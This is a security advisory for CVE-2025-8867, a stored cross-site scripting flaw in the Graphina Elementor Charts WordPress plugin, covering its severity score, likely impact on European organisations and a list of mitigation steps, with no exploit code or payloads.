CVE-2025-8867 is a stored Cross-Site Scripting (XSS) vulnerability affecting the Graphina – Elementor Charts and Graphs WordPress plugin developed by iqonicdesign. This vulnerability exists in version 3.1.3 and earlier, caused by improper input sanitization and insufficient output escaping of user-supplied attributes such as chart categories, titles, and tooltip settings. An authenticated attacker with contributor-level privileges or higher can exploit this flaw by injecting malicious JavaScript code into chart widget parameters. Because the malicious script is stored persistently within the plugin's data and rendered on pages, it executes whenever any user accesses the compromised page. The vulnerability is classified under CWE-79, which pertains to improper neutralization of input during web page generation, leading to XSS. The CVSS v3.1 base score is 6.4 (medium severity), reflecting that the attack vector is network-based with low attack complexity, requiring privileges (PR:L) but no user interaction (UI:N). The scope is changed (S:C), indicating that exploitation can affect resources beyond the vulnerable component, with limited confidentiality and integrity impacts but no availability impact. No known exploits are currently reported in the wild. The vulnerability can lead to session hijacking, defacement, or redirection to malicious sites, potentially compromising user data and site integrity. Since the plugin is widely used in WordPress sites for visual data representation, the vulnerability poses a significant risk to websites that allow contributor-level users to create or edit content with embedded charts. The lack of a patch link suggests a fix may not yet be publicly available, emphasizing the need for immediate mitigation steps.

For European organizations, this vulnerability can have serious consequences, especially for those relying on WordPress sites with the Graphina plugin for data visualization. Exploitation could lead to unauthorized script execution in the context of site visitors or administrators, risking credential theft, session hijacking, or unauthorized actions performed on behalf of users. This can damage organizational reputation, lead to data breaches involving personal or sensitive information protected under GDPR, and disrupt business operations. Since contributor-level access is required, insider threats or compromised accounts could be leveraged to exploit this vulnerability. The persistent nature of stored XSS means that once injected, malicious scripts can affect multiple users over time, increasing exposure. European organizations in sectors such as finance, healthcare, government, and e-commerce, which often use WordPress for public-facing websites, are particularly at risk. Additionally, regulatory scrutiny in Europe mandates prompt remediation of such vulnerabilities to avoid penalties.

1. Immediate mitigation involves restricting contributor-level access to trusted users only and auditing existing contributor accounts for suspicious activity. 2. Disable or remove the Graphina – Elementor Charts and Graphs plugin until a security patch is released. 3. Implement Web Application Firewall (WAF) rules to detect and block malicious payloads targeting chart widget parameters. 4. Employ Content Security Policy (CSP) headers to limit the execution of unauthorized scripts on affected pages. 5. Regularly monitor site content for injected scripts or unusual modifications in chart widgets. 6. Once a patch is available, promptly update the plugin to the fixed version. 7. Educate content contributors about safe input practices and the risks of injecting untrusted content. 8. Conduct security reviews and penetration testing focused on user input handling in WordPress plugins. These steps go beyond generic advice by focusing on access control, proactive monitoring, and layered defenses tailored to the plugin's context.